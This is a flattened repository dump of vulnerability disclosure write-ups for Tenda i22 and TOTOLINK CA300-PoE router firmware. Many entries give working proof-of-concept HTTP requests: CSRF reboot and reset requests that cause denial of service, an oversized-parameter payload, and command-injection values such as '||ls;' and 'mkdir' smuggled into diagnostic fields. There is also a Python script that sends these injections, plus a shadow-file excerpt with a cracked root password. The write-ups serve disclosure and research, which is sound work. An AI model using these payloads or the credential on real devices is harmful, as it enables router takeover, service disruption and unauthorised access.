Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 44 | ``` 45 | 46 | ![image-20221120113929418](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDset/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDset/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDset/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDset/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDset/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDset/images/03.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolReboot/fromSysToolReboot.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** is vulnerable to Cross Site Request Forgery (CSRF) via function `fromSysToolReboot` 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SysToolReboot` page,The details are shown below: 20 | 21 | ![image-20221120141002113](images/02.png) 22 | 23 | ![image-20221120141103919](images/04.png) 24 | 25 | It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page. 26 | 27 | ## POC 28 | 29 | This POC can result in a Dos. 30 | 31 | ``` 32 | GET /goform/SysToolReboot HTTP/1.1 33 | Host: 192.168.204.133 34 | Upgrade-Insecure-Requests: 1 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: bLanguage=cn; user=; password=vlz1qw 40 | Connection: close 41 | 42 | 43 | ``` 44 | 45 | ![image-20221121105432590](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/fromSysToolReboot/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolReboot/images/01.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolReboot/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolReboot/images/02.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolReboot/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolReboot/images/03.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolReboot/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolReboot/images/04.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolRestoreSet/fromSysToolRestoreSet.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** is vulnerable to Cross Site Request Forgery (CSRF) via function `fromSysToolRestoreSet` 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SysToolRestoreSet` page,The details are shown below: 20 | 21 | ![image-20221120142340526](images/02.png) 22 | 23 | ![image-20221120142412727](images/04.png) 24 | 25 | It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page. 26 | 27 | ## POC 28 | 29 | This POC can result in a Dos. 30 | 31 | ``` 32 | GET /goform/SysToolRestoreSet HTTP/1.1 33 | Host: 192.168.204.133 34 | Cache-Control: max-age=0 35 | Upgrade-Insecure-Requests: 1 36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | 44 | ``` 45 | 46 | ![image-20221120142509445](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/fromSysToolRestoreSet/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolRestoreSet/images/01.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolRestoreSet/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolRestoreSet/images/02.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolRestoreSet/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolRestoreSet/images/03.png -------------------------------------------------------------------------------- /tenda_i22/fromSysToolRestoreSet/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/fromSysToolRestoreSet/images/04.png -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/NTPSyncWithHost.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the function NTPSyncWithHost 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `NTPSyncWithHost`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"} 42 | ``` 43 | 44 | ![image-20230112164910582](images/3.png) 45 | 46 | ![image-20230112165037971](images/4.png) 47 | 48 | Folder created successfully 49 | 50 | ![image-20230112165248306](images/5.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/NTPSyncWithHost/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/NTPSyncWithHost/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/NTPSyncWithHost/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/NTPSyncWithHost/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/NTPSyncWithHost/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/NTPSyncWithHost/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/firmware/TOTOLINK_C8B810A-1E_NA_AP0155_QCA9531_SPI_16M128M_V6.2c.884_B20180522_ALL.web: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/firmware/TOTOLINK_C8B810A-1E_NA_AP0155_QCA9531_SPI_16M128M_V6.2c.884_B20180522_ALL.web -------------------------------------------------------------------------------- /totolink_ca300-poe/root_hard_code/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/root_hard_code/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/root_hard_code/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/root_hard_code/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/root_hard_code/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/root_hard_code/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/root_hard_code/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/root_hard_code/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/root_hard_code/root_hard_code.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a hard code password for root stored in the component /etc/shadow. 2 | 3 | ## Description 4 | 5 | There is a hard code password for root in /etc/shadow 6 | 7 | ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | ![image-20230113113147644](images/3.png) 25 | 26 | ``` 27 | root:$1$ArDex.Yh$J4iv2K7mBpSnHewlCdkdp.:0:0:99999:7::: 28 | daemon:*:0:0:99999:7::: 29 | admin:$1$zGWRVM14$u/x/W8yls/LouMLrunwbL/:0:0:99999:7::: 30 | ftp:*:0:0:99999:7::: 31 | network:*:0:0:99999:7::: 32 | nobody:*:0:0:99999:7::: 33 | ``` 34 | 35 | ![image-20230113124921819](images/4.png) 36 | 37 | after decrypt the passwd we got `cs2012` 38 | 39 | -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/4.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/6.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagHost/images/7.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagHost/setNetworkDiag_NetDiagHost.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"} 42 | ``` 43 | 44 | ![image-20230112110403648](images/3.png) 45 | 46 | POC2: 47 | 48 | ``` 49 | import requests 50 | url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi" 51 | cookie = {"Cookie":"SESSION_ID=2:1672999258:2"} 52 | data = {"topicurl" : "setDiagnosisCfg", 53 | "ip" : "192.168.1.1||mkdir /test1111;"} 54 | 55 | data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"} 56 | 57 | response = requests.post(url, cookies=cookie, json=data1) 58 | print(response.text) 59 | print(response) 60 | 61 | data2 = {"topicurl":"setting/showNetworkDiag"} 62 | response = requests.post(url, cookies=cookie, json=data2) 63 | print(response.text) 64 | print(response) 65 | 66 | ``` 67 | 68 | ![image-20230112151607217](images/4.png) 69 | 70 | The function `setNetworkDiag` is used to set the corresponding variable 71 | 72 | ![image-20230112182605470](images/5.png) 73 | 74 | In function `showNetworkDiag` 75 | 76 | ![image-20230112182702672](images/6.png) 77 | 78 | step into function `getDiagInfo` 79 | 80 | ![image-20230112182800857](images/7.png) 81 | -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/6.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/images/7.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingNum/setNetworkDiag_NetDiagPingNum.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the function setNetworkDiag 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"} 42 | ``` 43 | 44 | ![image-20230112184654180](images/3.png) 45 | 46 | 47 | 48 | The function `setNetworkDiag` is used to set the corresponding variable 49 | 50 | ![image-20230112182605470](images/5.png) 51 | 52 | In function `showNetworkDiag` 53 | 54 | ![image-20230112182702672](images/6.png) 55 | 56 | step into function `getDiagInfo` 57 | 58 | ![image-20230112182800857](images/7.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/2.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/5.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/6.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/images/7.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingSize/setNetworkDiag_NetDiagPingSize.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the function setNetworkDiag 2 | 3 | ## Description 4 | 5 | `TOTOLINK` Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in `setNetworkDiag`. 6 | 7 | ## ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | POC1: 25 | 26 | ``` 27 | POST /cgi-bin/cstecgi.cgi HTTP/1.1 28 | Host: 192.168.0.254 29 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 30 | Accept: */* 31 | Accept-Language: en-US,en;q=0.5 32 | Accept-Encoding: gzip, deflate 33 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 34 | X-Requested-With: XMLHttpRequest 35 | Content-Length: 100 36 | Origin: http://192.168.0.254 37 | Connection: keep-alive 38 | Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260 39 | Cookie: SESSION_ID=2:1673492439:2 40 | 41 | {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingSize": "100||ls;"} 42 | ``` 43 | 44 | ![image-20230112185124300](images/3.png) 45 | 46 | 47 | 48 | The function `setNetworkDiag` is used to set the corresponding variable 49 | 50 | ![image-20230112182605470](images/5.png) 51 | 52 | In function `showNetworkDiag` 53 | 54 | ![image-20230112182702672](images/6.png) 55 | 56 | step into function `getDiagInfo` 57 | 58 | ![image-20230112182800857](images/7.png) -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/1.png -------------------------------------------------------------------------------- /totolink_ca300-poe/setNetworkDiag_NetDiagPingTimeOut/images/2.png: -------------------------------------------------------------------------------- 